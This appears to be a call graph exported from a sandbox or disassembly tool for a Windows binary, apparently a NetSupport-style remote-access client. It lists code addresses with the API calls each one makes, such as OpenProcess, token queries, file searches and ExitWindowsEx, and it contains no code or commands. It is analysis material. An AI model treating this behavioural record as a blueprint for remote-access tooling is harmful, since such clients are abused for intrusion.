OpenProcess 58004->58006 58007 110613d0 397 API calls 58005->58007 58006->57997 58008 1102e9f9 58006->58008 58009 1102eae1 58007->58009 59091 11094b30 215 API calls 58008->59091 58011 1102eaf8 58009->58011 58012 1102eaef 58009->58012 58354 11145910 58011->58354 59092 11027d60 233 API calls 2 library calls 58012->59092 58013 1102ea18 58016 11146450 std::locale::facet::_Facet_Register 21 API calls 58013->58016 58018 1102ea2c 58016->58018 58017 1102eaf4 58017->58011 58019 1102ea6b CloseHandle FindWindowA 58018->58019 58022 11146450 std::locale::facet::_Facet_Register 21 API calls 58018->58022 58020 1102ea93 GetWindowThreadProcessId 58019->58020 58021 1102eaa7 58019->58021 58020->58021 58023 11146450 std::locale::facet::_Facet_Register 21 API calls 58021->58023 58025 1102ea3e SendMessageA WaitForSingleObject 58022->58025 58026 1102eab4 58023->58026 58024 1102eb07 58369 11143230 58024->58369 58025->58019 58028 1102ea5e 58025->58028 58026->57997 58030 11146450 std::locale::facet::_Facet_Register 21 API calls 58028->58030 58029 1102eb2a 58032 1102ec01 58029->58032 58380 11062d60 58029->58380 58031 1102ea68 58030->58031 58031->58019 58395 110274c0 58032->58395 58036 110b7920 std::locale::facet::_Facet_Register 9 API calls 58037 1102eb5e 58036->58037 58039 11146450 std::locale::facet::_Facet_Register 21 API calls 58037->58039 58038 1102ec26 58048 1102ec41 58038->58048 58414 1102a620 58038->58414 58041 1102eb70 58039->58041 58046 1102a620 std::locale::facet::_Facet_Register 262 API calls 58046->58048 58417 110281a0 58048->58417 58345 11142bc5 58343->58345 58344 11165797 197 API calls std::locale::facet::_Facet_Register 58344->58345 58345->58344 58346 1102e6d4 58345->58346 58346->57967 58939 11081bb0 58346->58939 58348 11061446 58347->58348 58349 110613f7 58347->58349 58350 11161d01 _strupr_s_l_stat 5 API calls 58348->58350 58349->58348 58352 11081bb0 200 API calls 58349->58352 59149 110612f0 397 API calls 4 library calls 58349->59149 58351 1102eac9 58350->58351 58351->58003 58352->58349 59150 11144bd0 58354->59150 58357 11144bd0 std::locale::facet::_Facet_Register 395 API calls 58358 11145947 wsprintfA 58357->58358 58359 11143230 std::locale::facet::_Facet_Register 8 API calls 58358->58359 58361 11145964 58359->58361 58360 11145990 58363 11161d01 _strupr_s_l_stat 5 API calls 58360->58363 58361->58360 58362 11143230 std::locale::facet::_Facet_Register 8 API calls 58361->58362 58364 11145979 58362->58364 58365 1114599c 58363->58365 58364->58360 58366 11145980 58364->58366 58365->58024 58367 11161d01 _strupr_s_l_stat 5 API calls 58366->58367 58368 1114598c 58367->58368 58368->58024 58370 11143251 58369->58370 58370->58370 58371 111432ad CreateFileA 58370->58371 58372 111432ee CloseHandle 58371->58372 58373 111432ce 58371->58373 58376 11161d01 _strupr_s_l_stat 5 API calls 58372->58376 58374 111432d2 CreateFileA 58373->58374 58375 1114330b 58373->58375 58374->58372 58374->58375 58377 11161d01 _strupr_s_l_stat 5 API calls 58375->58377 58378 11143307 58376->58378 58379 1114331a 58377->58379 58378->58029 58379->58029 58381 1105dd10 191 API calls 58380->58381 58382 11062d88 58381->58382 59196 11061c90 58382->59196 58384 1102eb51 58384->58032 58384->58036 58386 1105de40 5 API calls 58387 11062de9 58386->58387 58388 1105dd10 191 API calls 58387->58388 58389 11062e1d 58388->58389 58390 11062e3c 58389->58390 58393 1105de40 5 API calls 58389->58393 58391 1105dd10 191 API calls 58390->58391 58393->58390 58396 110274f4 58395->58396 58397 1105dd10 191 API calls 58396->58397 58400 11027509 58397->58400 58398 110275d8 58404 1102768c 58398->58404 58412 11081bb0 200 API calls 58398->58412 58413 111450a0 std::locale::facet::_Facet_Register 206 API calls 58398->58413 59933 110612f0 397 API calls 4 library calls 58398->59933 58399 1102755f LoadIconA 58402 11027571 58399->58402 58403 1102757a GetSystemMetrics GetSystemMetrics LoadImageA 58399->58403 58400->58398 58400->58399 58401 11145320 std::locale::facet::_Facet_Register 206 API calls 58400->58401 58405 11027542 LoadLibraryExA 58401->58405 58402->58403 58406 110275b3 58403->58406 58407 1102759f LoadIconA 58403->58407 58408 11161d01 _strupr_s_l_stat 5 API calls 58404->58408 58405->58399 58405->58407 58406->58398 58410 110275b7 GetSystemMetrics GetSystemMetrics LoadImageA 58406->58410 58407->58406 58411 11027699 58408->58411 58410->58398 58411->58038 58412->58398 58413->58398 59934 110285f0 58414->59934 58416 1102a62e 58416->58046 58418 11146450 std::locale::facet::_Facet_Register 21 API calls 58417->58418 58419 110281c6 58418->58419 58420 110282b4 58419->58420 58421 110281dd GetModuleFileNameA 58419->58421 59968 11013830 22 API calls 2 library calls 58420->59968 58423 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 58421->58423 58425 11028201 58423->58425 58424 110282c7 58426 110282cd 58424->58426 58425->58426 58427 1102820e wsprintfA 58425->58427 58428 11146450 std::locale::facet::_Facet_Register 21 API calls 58426->58428 58430 11028242 58427->58430 58429 110282db LoadLibraryExA 58428->58429 58430->58426 58431 1102824a WaitForSingleObject GetExitCodeProcess 58430->58431 58940 11081bbd 58939->58940 58941 11081bc2 58939->58941 60869 11081990 IsDBCSLeadByte 58940->60869 58943 11081bcb 58941->58943 58948 11081bdf 58941->58948 60870 111646ce 192 API calls 2 library calls 58943->60870 58945 11081bd8 58945->57969 58946 11081c43 58946->57969 58947 11165797 197 API calls std::locale::facet::_Facet_Register 58947->58948 58948->58946 58948->58947 58950 11146450 std::locale::facet::_Facet_Register 21 API calls 58949->58950 58951 1102d36c 58950->58951 58952 11145320 std::locale::facet::_Facet_Register 206 API calls 58951->58952 58953 1102d374 58952->58953 58954 1102d3a9 GetCurrentProcess SetPriorityClass 58953->58954 58955 1102d37d InterlockedIncrement 58953->58955 58958 1102d3dd 58954->58958 58955->58954 58956 1102d38c 58955->58956 58957 11146450 std::locale::facet::_Facet_Register 21 API calls 58956->58957 58959 1102d396 58957->58959 58960 1102d3e6 SetEvent 58958->58960 58963 1102d3ed 58958->58963 58961 1102d3a0 Sleep 58959->58961 58960->58963 58961->58961 58962 1102d424 58967 1102d452 58962->58967 60890 1109f1d0 401 API calls std::locale::facet::_Facet_Register 58962->60890 58963->58962 60888 11029370 401 API calls 2 library calls 58963->60888 58966 1102d40d 60889 110ff6c0 400 API calls 2 library calls 58966->60889 60871 11028090 SetEvent 58967->60871 58970 1102d468 58971 1102d47d 58970->58971 60891 110ec980 415 API calls 58970->60891 58973 1102d49f 58971->58973 60892 110594a0 SetEvent 58971->60892 58975 1102d4de 58973->58975 58976 1102d4b3 Sleep 58973->58976 58977 11146450 std::locale::facet::_Facet_Register 21 API calls 58975->58977 58976->58975 58978 1102d4e8 58977->58978 58979 1102d518 58978->58979 58980 1105dd10 191 API calls 58978->58980 58982 1102d53f 58979->58982 58985 1102d58a 58979->58985 58980->58979 60872 110affa0 58982->60872 58987 1102d5a9 58985->58987 58999 1102d5cb 58985->58999 58990 1102d5af PostThreadMessageA 58987->58990 58987->58999 58988 1102d613 58991 1102d62d 58988->58991 59004 11146450 std::locale::facet::_Facet_Register 21 API calls 58988->59004 60895 1110f3a0 WaitForSingleObject 58990->60895 58995 1102d66b 58991->58995 58996 1102d65c 58991->58996 58992 1102d5f0 60897 11059400 DeleteCriticalSection CloseHandle 58992->60897 58994 1102d56a 59001 1102d57d 58994->59001 60894 111352b0 426 API calls 5 library calls 58994->60894 59003 1102d681 58995->59003 59008 11075d10 458 API calls 58995->59008 60898 11105420 26 API calls std::locale::facet::_Facet_Register 58996->60898 58999->58988 58999->58992 60896 1110f3a0 WaitForSingleObject 58999->60896 60917 1100d4e0 FreeLibrary 59001->60917 59009 11146450 std::locale::facet::_Facet_Register 21 API calls 59003->59009 59004->58991 59007 1102d661 60899 11107b50 747 API calls std::locale::facet::_Facet_Register 59007->60899 59008->59003 59012 1102d68b 59009->59012 59010 1102d889 59013 1102d8a0 59010->59013 60918 1100d200 wsprintfA 59010->60918 59016 1113cc30 430 API calls 59012->59016 59024 1102d8c7 GetModuleFileNameA GetFileAttributesA 59013->59024 59037 1102d9fa 59013->59037 59014 1102d666 60900 11105ac0 477 API calls std::locale::facet::_Facet_Register 59014->60900 59017 1102d690 59016->59017 59020 11146450 std::locale::facet::_Facet_Register 21 API calls 59017->59020 59022 1102d69a 59020->59022 59021 1102d895 59023 11146450 std::locale::facet::_Facet_Register 21 API calls 59021->59023 59026 1102d6b7 59022->59026 59027 1102d6a9 59022->59027 59023->59013 59028 1102d8ef 59024->59028 59024->59037 59025 11146450 std::locale::facet::_Facet_Register 21 API calls 59029 1102da92 59025->59029 59031 11146450 std::locale::facet::_Facet_Register 21 API calls 59026->59031 60901 1109d920 WaitForSingleObject SetEvent WaitForSingleObject CloseHandle 59027->60901 59032 1110f420 std::locale::facet::_Facet_Register 395 API calls 59028->59032 60921 11146410 FreeLibrary 59029->60921 59035 1102d6c1 59031->59035 59049 1102d8f6 59032->59049 59045 1102d6d5 std::ios_base::_Tidy 59035->59045 60902 1110e5c0 DeleteCriticalSection std::ios_base::_Tidy 59035->60902 59036 1102da9a 59038 1102dad6 59036->59038 59041 1102dac4 ExitWindowsEx 59036->59041 59042 1102dab4 ExitWindowsEx Sleep 59036->59042 59037->59025 59043 1102dae6 59038->59043 59044 1102dadb Sleep 59038->59044 59040 1102d74f 59046 1102d75b 59040->59046 59047 1102d769 59040->59047 59041->59038 59042->59041 59051 11146450 std::locale::facet::_Facet_Register 21 API calls 59043->59051 59044->59043 59045->59040 60903 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 59045->60903 60905 1110fc70 408 API calls 2 library calls 59046->60905 59056 1102d7e2 59047->59056 59068 1102d760 std::ios_base::_Tidy 59047->59068 59054 11142bb0 197 API calls 59049->59054 59052 1102daf0 ExitProcess 59051->59052 59057 1102d93d 59054->59057 59058 11146450 std::locale::facet::_Facet_Register 21 API calls 59056->59058 59060 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 59057->59060 59088 1102d9e3 59057->59088 59059 1102d7ec 59058->59059 59061 1102d7fb 59059->59061 59062 1102d809 CloseHandle 59059->59062 59066 1102d953 59060->59066 60907 1108a570 59061->60907 59063 1102d824 _free 59062->59063 59064 1102d82d 59062->59064 59063->59064 59089 1102d869 std::ios_base::_Tidy 59064->59089 60914 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 59064->60914 59065 11146450 std::locale::facet::_Facet_Register 21 API calls 59086 1102d6ff std::ios_base::_Tidy 59065->59086 59069 1102d96e _memset 59066->59069 60919 11029450 395 API calls 2 library calls 59066->60919 59068->59047 59068->59056 60906 1110fc70 408 API calls 2 library calls 59068->60906 59073 1102d988 FindFirstFileA 59069->59073 59070 1102d800 std::ios_base::_Tidy 59070->59062 59075 1102d9d4 59073->59075 59076 1102d9a8 FindNextFileA 59073->59076 59074 1102d83c 59078 1102d840 _free 59074->59078 59079 1102d858 59074->59079 60920 111266e0 421 API calls 5 library calls 59075->60920 59087 1102d9c8 FindClose 59076->59087 60915 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 59078->60915 59079->59089 60916 1110fc70 408 API calls 2 library calls 59079->60916 59080 1102d7d9 std::ios_base::_Tidy 59080->59056 59086->59040 59086->59065 60904 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 59086->60904 59087->59075 59088->59037 59089->59001 59091->58013 59092->58017 59149->58349 59151 11144bf2 59150->59151 59152 11144c09 std::locale::facet::_Facet_Register 59150->59152 59193 11029450 395 API calls 2 library calls 59151->59193 59156 11144c3c GetModuleFileNameA 59152->59156 59166 11144d97 59152->59166 59155 11161d01 _strupr_s_l_stat 5 API calls 59157 11144db3 wsprintfA 59155->59157 59174 11081b40 59156->59174 59157->58357 59159 11144c51 59160 11144c61 SHGetFolderPathA 59159->59160 59161 11144d48 59159->59161 59163 11144c8e 59160->59163 59164 11144cad SHGetFolderPathA 59160->59164 59162 11142290 std::locale::facet::_Facet_Register 392 API calls 59161->59162 59162->59166 59163->59164 59168 11144c94 59163->59168 59167 11144ce2 59164->59167 59166->59155 59170 1102a620 std::locale::facet::_Facet_Register 262 API calls 59167->59170 59194 11029450 395 API calls 2 library calls 59168->59194 59172 11144cf3 59170->59172 59178 11144670 59172->59178 59175 11081b53 _strrchr 59174->59175 59177 11081b6a std::locale::facet::_Facet_Register 59175->59177 59195 11081990 IsDBCSLeadByte 59175->59195 59177->59159 59179 111446fa 59178->59179 59180 1114467b 59178->59180 59179->59161 59180->59179 59181 1114468b GetFileAttributesA 59180->59181 59182 111446a5 59181->59182 59183 11144697 59181->59183 59184 11163cf8 __strdup 67 API calls 59182->59184 59183->59161 59185 111446ac 59184->59185 59186 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 59185->59186 59187 111446b6 59186->59187 59188 11144670 std::locale::facet::_Facet_Register 68 API calls 59187->59188 59192 111446d6 59187->59192 59189 111446c6 59188->59189 59190 111446dc _free CreateDirectoryA 59189->59190 59191 111446ce _free 59189->59191 59190->59192 59191->59192 59192->59161 59195->59177 59306 11144ea0 59196->59306 59198 11061d1c 59199 110d1550 395 API calls 59198->59199 59200 11061d30 59199->59200 59201 11061f17 59200->59201 59202 11061d44 std::ios_base::_Tidy 59200->59202 59314 1116449d 59200->59314 59204 1116449d _fgets 82 API calls 59201->59204 59203 11062c88 59202->59203 59207 11163db7 std::locale::facet::_Facet_Register 219 API calls 59202->59207 59205 110d07c0 396 API calls 59203->59205 59208 11061f31 59204->59208 59214 11061e11 std::ios_base::_Tidy 59205->59214 59207->59203 59213 11061f97 _strpbrk 59208->59213 59215 11061f38 59208->59215 59209 11061dc7 59210 11061dce 59209->59210 59224 11061e1d _strpbrk std::locale::facet::_Facet_Register 59209->59224 59211 11061e03 59210->59211 59362 11163db7 59210->59362 59212 110d07c0 396 API calls 59211->59212 59212->59214 59333 11163676 59213->59333 59219 11161d01 _strupr_s_l_stat 5 API calls 59214->59219 59216 11061f7d 59215->59216 59220 11163db7 std::locale::facet::_Facet_Register 219 API calls 59215->59220 59221 110d07c0 396 API calls 59216->59221 59222 11062cbf 59219->59222 59220->59216 59221->59214 59222->58384 59222->58386 59222->58387 59224->59201 59229 11061eb8 59224->59229 59230 11061efd 59229->59230 59233 11163db7 std::locale::facet::_Facet_Register 219 API calls 59229->59233 59234 110d07c0 396 API calls 59230->59234 59233->59230 59234->59214 59311 11144eb3 std::ios_base::_Tidy 59306->59311 59308 11144f1a std::ios_base::_Tidy 59308->59198 59309 11144ed5 GetLastError 59310 11144ee0 Sleep 59309->59310 59309->59311 59312 11163fed std::locale::facet::_Facet_Register 251 API calls 59310->59312 59311->59308 59311->59309 59399 11163fed 59311->59399 59313 11144ef2 59312->59313 59313->59308 59313->59311 59316 111644a9 _fgets 59314->59316 59315 111644bc 59759 111692ef 67 API calls __getptd_noexit 59315->59759 59316->59315 59318 111644ed 59316->59318 59320 111644f2 __lock_file 59318->59320 59326 111644cc _fgets 59318->59326 59319 111644c1 59760 1116df04 11 API calls _strupr_s_l_stat 59319->59760 59322 11164506 59320->59322 59327 11164571 59320->59327 59761 11169287 59322->59761 59324 1116459e 59770 111645cd LeaveCriticalSection LeaveCriticalSection _fputs 59324->59770 59326->59209 59327->59324 59739 11171a25 59327->59739 59329 1116450c 59329->59327 59768 111692ef 67 API calls __getptd_noexit 59329->59768 59331 11164566 59769 1116df04 11 API calls _strupr_s_l_stat 59331->59769 59334 1116368f 59333->59334 59814 11163420 59334->59814 59363 11163dc3 _fgets 59362->59363 59364 11163dd5 59363->59364 59365 11163dea 59363->59365 59887 111692ef 67 API calls __getptd_noexit 59364->59887 59367 11163dfd __lock_file 59365->59367 59373 11163de5 _fgets 59365->59373 59871 11163d4a 59367->59871 59369 11163dda 59373->59211 59402 11163f31 59399->59402 59401 11163fff 59401->59311 59405 11163f3d _fgets 59402->59405 59403 11163f50 59458 111692ef 67 API calls __getptd_noexit 59403->59458 59405->59403 59407 11163f7d 59405->59407 59406 11163f55 59459 1116df04 11 API calls _strupr_s_l_stat 59406->59459 59421 111716f8 59407->59421 59410 11163f82 59418 11163f60 _fgets @_EH4_CallFilterFunc@8 59418->59401 59422 11171704 _fgets 59421->59422 59463 1117373c 59422->59463 59424 11171787 59470 11171822 59424->59470 59425 1117178e 59475 11169d79 59425->59475 59429 11171817 _fgets 59429->59410 59430 111717a3 InitializeCriticalSectionAndSpinCount 59432 111717d6 EnterCriticalSection 59430->59432 59433 111717c3 _free 59430->59433 59431 11171712 59431->59424 59431->59425 59473 1117367a 67 API calls 8 library calls 59431->59473 59474 1116b048 LeaveCriticalSection LeaveCriticalSection _doexit 59431->59474 59432->59424 59433->59424 59458->59406 59459->59418 59464 11173764 EnterCriticalSection 59463->59464 59465 11173751 59463->59465 59464->59431 59481 1117367a 67 API calls 8 library calls 59465->59481 59467 11173757 59467->59464 59482 1116d7aa 67 API calls 3 library calls 59467->59482 59483 11173663 LeaveCriticalSection 59470->59483 59472 11171829 59472->59429 59473->59431 59474->59431 59476 11169d82 59475->59476 59477 11162b51 _malloc 66 API calls 59476->59477 59478 11169db8 59476->59478 59479 11169d99 Sleep 59476->59479 59477->59476 59478->59424 59478->59430 59480 11169dae 59479->59480 59480->59476 59480->59478 59481->59467 59483->59472 59740 11171a32 59739->59740 59744 11171a47 59739->59744 59799 111692ef 67 API calls __getptd_noexit 59740->59799 59742 11171a37 59800 1116df04 11 API calls _strupr_s_l_stat 59742->59800 59743 11171a42 59743->59327 59744->59743 59746 11171a7c 59744->59746 59801 1117712e 67 API calls __malloc_crt 59744->59801 59748 11169287 _fgets 67 API calls 59746->59748 59749 11171a90 59748->59749 59771 111747ed 59749->59771 59759->59319 59760->59326 59762 11169293 59761->59762 59763 111692a8 59761->59763 59812 111692ef 67 API calls __getptd_noexit 59762->59812 59763->59329 59765 11169298 59813 1116df04 11 API calls _strupr_s_l_stat 59765->59813 59767 111692a3 59767->59329 59768->59331 59769->59327 59770->59326 59799->59742 59800->59743 59801->59746 59812->59765 59813->59767 59826 11163399 59814->59826 59816 11163444 59834 111692ef 67 API calls __getptd_noexit 59816->59834 59820 11163491 __isctype_l 59822 1116347a 59820->59822 59822->59820 59824 111634c1 59822->59824 59827 111633ac 59826->59827 59833 111633f9 59826->59833 59828 1116b7b5 __getptd 67 API calls 59827->59828 59829 111633b1 59828->59829 59833->59816 59833->59822 59887->59369 59933->58398 59935 11028613 59934->59935 59936 11028c5b 59934->59936 59937 110286d0 GetModuleFileNameA 59935->59937 59946 11028648 59935->59946 59939 11028cf7 59936->59939 59940 11028d0a 59936->59940 59938 110286f1 _strrchr 59937->59938 59944 11163fed std::locale::facet::_Facet_Register 251 API calls 59938->59944 59942 11161d01 _strupr_s_l_stat 5 API calls 59939->59942 59941 11161d01 _strupr_s_l_stat 5 API calls 59940->59941 59943 11028d1b 59941->59943 59945 11028d06 59942->59945 59943->58416 59947 110286cb 59944->59947 59945->58416 59946->59946 59948 11163fed std::locale::facet::_Facet_Register 251 API calls 59946->59948 59947->59936 59962 11026890 82 API calls 2 library calls 59947->59962 59948->59947 59950 11163db7 std::locale::facet::_Facet_Register 219 API calls 59950->59936 59951 11028744 59959 11028bc5 59951->59959 59963 11026700 67 API calls 3 library calls 59951->59963 59953 11028780 59964 11026890 82 API calls 2 library calls 59953->59964 59959->59950 59959->59959 59962->59951 59963->59953 59968->58424 60869->58941 60870->58945 60871->58970 60922 110805f0 60872->60922 60877 1102d54a 60881 110eb080 60877->60881 60878 110affe7 60934 11029450 395 API calls 2 library calls 60878->60934 60882 110affa0 397 API calls 60881->60882 60883 110eb0ad 60882->60883 60950 110ea450 60883->60950 60885 110eb0f1 60960 110b0190 398 API calls std::locale::facet::_Facet_Register 60885->60960 60887 1102d555 60893 110b0190 398 API calls std::locale::facet::_Facet_Register 60887->60893 60888->58966 60889->58962 60890->58967 60891->58971 60892->58973 60893->58994 60894->59001 60895->58987 60896->58999 60898->59007 60899->59014 60900->58995 60902->59045 60903->59086 60904->59086 60905->59068 60906->59080 60908 1108a617 60907->60908 60912 1108a5aa std::ios_base::_Tidy 60907->60912 60909 1108a61e DeleteCriticalSection 60908->60909 60963 1106e1b0 60909->60963 60910 1108a5be CloseHandle 60910->60912 60912->60908 60912->60910 60913 1108a644 std::ios_base::_Tidy 60913->59070 60914->59074 60915->59074 60916->59089 60917->59010 60918->59021 60920->59088 60921->59036 60923 11080614 60922->60923 60924 11080618 60923->60924 60925 1108062f 60923->60925 60935 11029450 395 API calls 2 library calls 60924->60935 60927 11080648 60925->60927 60928 1108062c 60925->60928 60931 110aff90 60927->60931 60928->60925 60936 11029450 395 API calls 2 library calls 60928->60936 60937 110812d0 60931->60937 60938 110812f1 60937->60938 60940 1108131d 60937->60940 60939 1108130b 60938->60939 60938->60940 60941 11161d01 _strupr_s_l_stat 5 API calls 60939->60941 60942 1108136a wsprintfA 60940->60942 60943 11081345 wsprintfA 60940->60943 60944 11081319 60941->60944 60949 11029450 395 API calls 2 library calls 60942->60949 60943->60940 60944->60877 60944->60878 60951 110ea45b 60950->60951 60952 110ea4f5 60951->60952 60953 110ea47e 60951->60953 60954 110ea495 60951->60954 60952->60885 60961 11029450 395 API calls 2 library calls 60953->60961 60956 110ea492 60954->60956 60957 110ea4c2 SendMessageTimeoutA 60954->60957 60956->60954 60962 11029450 395 API calls 2 library calls 60956->60962 60957->60952 60960->60887 60966 1106e1c4 60963->60966 60964 1106e1c8 60964->60913 60966->60964 60967 1106d9a0 69 API calls 2 library calls 60966->60967 60967->60966 60969 11134d10 60970 11134d48 60969->60970 60971 11134d19 60969->60971 60972 11145320 std::locale::facet::_Facet_Register 206 API calls 60971->60972 60973 11134d1e 60972->60973 60973->60970 60974 11132bf0 403 API calls 60973->60974 60975 11134d27 60974->60975 60975->60970 60976 1105dd10 191 API calls 60975->60976 60976->60970 60977 110310c0 60978 110310ce 60977->60978 60979 11145e80 395 API calls 60978->60979 60980 110310df SetUnhandledExceptionFilter 60979->60980 60981 110310ef std::locale::facet::_Facet_Register 60980->60981 60982 11040860 60983 11040892 60982->60983 60984 11040898 60983->60984 60991 110408b4 60983->60991 60985 110facc0 15 API calls 60984->60985 60987 110408aa CloseHandle 60985->60987 60986 110409c8 60988 11161d01 _strupr_s_l_stat 5 API calls 60986->60988 60987->60991 60990 110409d5 60988->60990 60989 11040948 61004 110facc0 GetTokenInformation 60989->61004 60991->60986 60994 110408ed 60991->60994 61014 11087ee0 427 API calls 4 library calls 60991->61014 60994->60986 60994->60989 60995 1104095a 60996 11040962 CloseHandle 60995->60996 61000 11040969 60995->61000 60996->61000 60997 110409ab 60998 11161d01 _strupr_s_l_stat 5 API calls 60997->60998 61001 110409c4 60998->61001 60999 11040991 61002 11161d01 _strupr_s_l_stat 5 API calls 60999->61002 61000->60997 61000->60999 61003 110409a7 61002->61003 61005 110fad08 61004->61005 61006 110facf7 61004->61006 61015 110f1f50 9 API calls 61005->61015 61007 11161d01 _strupr_s_l_stat 5 API calls 61006->61007 61009 110fad04 61007->61009 61009->60995 61010 110fad2c 61010->61006 61011 110fad34 61010->61011 61012 11161d01 _strupr_s_l_stat 5 API calls 61011->61012 61013 110fad5a 61012->61013 61013->60995 61014->60994 61015->61010 61016 11089a40 61017 1110f6c0 ___DllMainCRTStartup 4 API calls 61016->61017 61018 11089a53 61017->61018 61019 11089a5d 61018->61019 61028 11089150 398 API calls std::locale::facet::_Facet_Register 61018->61028 61021 11089a84 61019->61021 61029 11089150 398 API calls std::locale::facet::_Facet_Register 61019->61029 61024 11089a93 61021->61024 61025 11089a10 61021->61025 61030 110896a0 61025->61030 61028->61019 61029->61021 61067 11088970 6 API calls ___DllMainCRTStartup 61030->61067 61032 110896d9 GetParent 61033 110896ec 61032->61033 61034 110896fd 61032->61034 61035 110896f0 GetParent 61033->61035 61036 11163fed std::locale::facet::_Facet_Register 251 API calls 61034->61036 61035->61034 61035->61035 61037 11089716 std::ios_base::_Tidy 61036->61037 61068 11013830 22 API calls 2 library calls 61037->61068 61039 1108974a 61039->61039 61040 11143230 std::locale::facet::_Facet_Register 8 API calls 61039->61040 61043 1108978a std::ios_base::_Tidy 61040->61043 61041 110897a5 61044 11163db7 std::locale::facet::_Facet_Register 219 API calls 61041->61044 61046 110897c3 61041->61046 61042 11089874 std::ios_base::_Tidy 61047 11161d01 _strupr_s_l_stat 5 API calls 61042->61047 61043->61041 61045 11142290 std::locale::facet::_Facet_Register 395 API calls 61043->61045 61044->61046 61045->61041 61046->61042 61048 1102a620 std::locale::facet::_Facet_Register 262 API calls 61046->61048 61049 11089962 61047->61049 61050 11089813 61048->61050 61049->61024 61051 11142290 std::locale::facet::_Facet_Register 395 API calls 61050->61051 61052 1108981b 61051->61052 61053 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 61052->61053 61054 11089832 61053->61054 61054->61042 61055 11081bb0 200 API calls 61054->61055 61056 1108984a 61055->61056 61057 1108988e 61056->61057 61058 11089851 61056->61058 61060 11081bb0 200 API calls 61057->61060 61069 110b75d0 61058->61069 61062 11089899 61060->61062 61062->61042 61064 110b75d0 69 API calls 61062->61064 61063 110b75d0 69 API calls 61063->61042 61065 110898a6 61064->61065 61065->61042 61066 110b75d0 69 API calls 61065->61066 61066->61042 61067->61032 61068->61039 61072 110b75b0 61069->61072 61075 111672e3 61072->61075 61078 11167264 61075->61078 61079 11167271 61078->61079 61080 1116728b 61078->61080 61096 11169302 67 API calls __getptd_noexit 61079->61096 61080->61079 61082 11167294 GetFileAttributesA 61080->61082 61084 111672a2 GetLastError 61082->61084 61085 111672b8 61082->61085 61083 11167276 61097 111692ef 67 API calls __getptd_noexit 61083->61097 61099 11169315 67 API calls 3 library calls 61084->61099 61092 11089857 61085->61092 61101 11169302 67 API calls __getptd_noexit 61085->61101 61088 1116727d 61098 1116df04 11 API calls _strupr_s_l_stat 61088->61098 61092->61042 61092->61063 61093 111672cb 61102 111692ef 67 API calls __getptd_noexit 61093->61102 61095 111672ae 61100 111692ef 67 API calls __getptd_noexit 61095->61100 61096->61083 61097->61088 61098->61092 61099->61095 61100->61092 61101->61093 61102->61095 61103 2d1020 GetCommandLineA 61105 2d1035 GetStartupInfoA 61103->61105 61106 2d108b 61105->61106 61107 2d1090 GetModuleHandleA 61105->61107 61106->61107 61110 2d1000 _NSMClient32 61107->61110 61109 2d10a2 ExitProcess 61110->61109 61111 111071e0 61112 111071ec 61111->61112 61113 1110720f 61112->61113 61114 111450a0 std::locale::facet::_Facet_Register 206 API calls 61112->61114 61119 11107218 61113->61119 61157 11106100 GetTickCount EnterCriticalSection GetTickCount 61113->61157 61117 11107201 61114->61117 61116 11107223 61117->61113 61120 111062e0 61117->61120 61190 11163180 61120->61190 61122 111062fb LoadLibraryA 61201 11137340 406 API calls 2 library calls 61122->61201 61124 11106361 61125 11106365 61124->61125 61126 1110637d 61124->61126 61125->61126 61127 1110636a 61125->61127 61128 111450a0 std::locale::facet::_Facet_Register 206 API calls 61126->61128 61129 11106375 61127->61129 61130 1110636e FreeLibrary 61127->61130 61131 11106386 61128->61131 61135 11161d01 _strupr_s_l_stat 5 API calls 61129->61135 61130->61129 61132 111063a1 LoadLibraryA GetProcAddress 61131->61132 61133 11106397 61131->61133 61134 111064d1 SetLastError 61132->61134 61139 11106443 61132->61139 61133->61132 61144 1110660f 61134->61144 61136 11106665 61135->61136 61136->61113 61137 111450a0 std::locale::facet::_Facet_Register 206 API calls 61138 11106624 61137->61138 61140 11106635 FreeLibrary 61138->61140 61141 1110663c 61138->61141 61143 111064f2 OpenProcess 61139->61143 61139->61144 61155 11106497 61139->61155 61191 11025d00 61139->61191 61140->61141 61141->61129 61142 11106640 FreeLibrary 61141->61142 61142->61129 61143->61139 61143->61155 61144->61137 61145 111064a5 GetProcAddress 61147 111064de SetLastError 61145->61147 61145->61155 61147->61155 61148 111065e5 CloseHandle 61148->61144 61148->61155 61149 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 61149->61155 61150 11081bb0 200 API calls 61150->61155 61151 11106556 OpenProcessToken 61151->61148 61151->61155 61152 11106574 GetTokenInformation 61153 111065d8 CloseHandle 61152->61153 61152->61155 61153->61148 61154 11106100 408 API calls 61154->61155 61155->61139 61155->61143 61155->61144 61155->61145 61155->61148 61155->61149 61155->61150 61155->61151 61155->61152 61155->61153 61155->61154 61202 110f5e90 25 API calls std::locale::facet::_Facet_Register 61155->61202 61158 11106153 61157->61158 61159 11106148 61157->61159 61161 11106172 61158->61161 61162 111061ca GetTickCount LeaveCriticalSection 61158->61162 61160 11146450 std::locale::facet::_Facet_Register 21 API calls 61159->61160 61160->61158 61163 11106190 GetTickCount LeaveCriticalSection 61161->61163 61203 11029450 395 API calls 2 library calls 61161->61203 61164 111061f0 EnterCriticalSection 61162->61164 61165 111061e2 61162->61165 61167 111061b3 61163->61167 61168 111061a8 61163->61168 61170 11106219 61164->61170 61169 11146450 std::locale::facet::_Facet_Register 21 API calls 61165->61169 61167->61116 61172 11146450 std::locale::facet::_Facet_Register 21 API calls 61168->61172 61173 111061ed 61169->61173 61174 11106223 61170->61174 61175 11106244 61170->61175 61172->61167 61173->61164 61176 111062be LeaveCriticalSection 61174->61176 61177 1110622e 61174->61177 61178 1110f420 std::locale::facet::_Facet_Register 395 API calls 61175->61178 61176->61116 61204 11029450 395 API calls 2 library calls 61177->61204 61182 1110624e 61178->61182 61181 111062bb 61181->61176 61183 11106274 61182->61183 61184 1110628b 61182->61184 61205 11029450 395 API calls 2 library calls 61183->61205 61206 110ebfb0 399 API calls 4 library calls 61184->61206 61187 111062a0 61189 11146450 std::locale::facet::_Facet_Register 21 API calls 61187->61189 61189->61181 61190->61122 61192 